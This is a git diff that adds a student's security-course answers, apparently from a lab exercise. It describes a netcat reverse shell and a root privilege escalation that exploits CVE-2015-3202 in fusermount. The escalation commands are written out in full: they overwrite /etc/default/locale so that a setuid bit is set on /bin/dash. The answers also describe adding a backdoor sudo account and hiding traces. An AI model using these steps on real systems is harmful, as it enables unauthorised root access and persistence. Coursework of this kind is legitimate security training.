aboutsummaryrefslogtreecommitdiff
path: root/CamilStaps-s4498062-Assignment-5/ex2
diff options
context:
space:
mode:
Diffstat (limited to 'CamilStaps-s4498062-Assignment-5/ex2')
-rw-r--r--CamilStaps-s4498062-Assignment-5/ex228
1 files changed, 28 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-5/ex2 b/CamilStaps-s4498062-Assignment-5/ex2
new file mode 100644
index 0000000..023e137
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-5/ex2
@@ -0,0 +1,28 @@
+a
+ There is not much to explain here.. we open a listening netcat in the first terminal and the command second terminal opens a connection to it from the server we should attack, and executes /bin/bash.
+
+ We then have a shell for www-data in the first terminal.
+
+c
+ I used https://www.exploit-db.com/exploits/37089/ which exploits CVE-2015-3202. It exploits a bug in fusermount which allows us to overwrite some file with root rights. We then overwrite /etc/bash.bashrc or /etc/default/locale or so to point to a script in /tmp, in which we do something that we want to be done with root rights. I used chmod 4755 /bin/dash, as suggested there. Then next time root logs in (in the case of /etc/bash.bashrc) or some cron job running with root rights sources /etc/default/locale, the exploit is executed. You can them come back and find /bin/dash with u+s rights, so you can get root rights in that shell.
+
+ I then created my own account (camil) with sudo rights so that I could clean up without losing root rights in case I would need it later. In particular, I removed the suid bit from /bin/dash so that others wouldn't find it and use it (e.g. find / -perm -u=s -type f 2>/dev/null)
+
+ Concretely, the commands used were:
+
+ $ printf "chmod 4755 /bin/dash" > /tmp/exploit
+ $ printf 755 /tmp/exploit
+ $ mkdir -p '/tmp/exploit||/tmp/exploit'
+ $ LIBMOUNT_MTAB=/etc/default/locale _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
+ fusermount: failed to open /etc/fuse.conf: Permission denied
+ sending file descriptor: Socket operation on non-socket
+ $ cat /etc/default/locale
+ /dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0
+
+ When locale is sourced, /dev/fuse /tmp/exploit will be piped to /tmp/exploit, so the latter is executed.
+
+ I had /etc/bash.bashrc changed as well since sometime on Saturday, but unfortunately root didn't login. I also found that using /etc/bash.bashrc isn't very stealthy, because if you're using bash as unprivileged user, you see:
+
+ bash: /dev/fuse: Permission denied
+ chmod: changing permissions of `/bin/dash': Operation not permitted
+
generated by cgit v1.2.3 (git 2.39.1) at 2025-03-15 08:33:45 +0000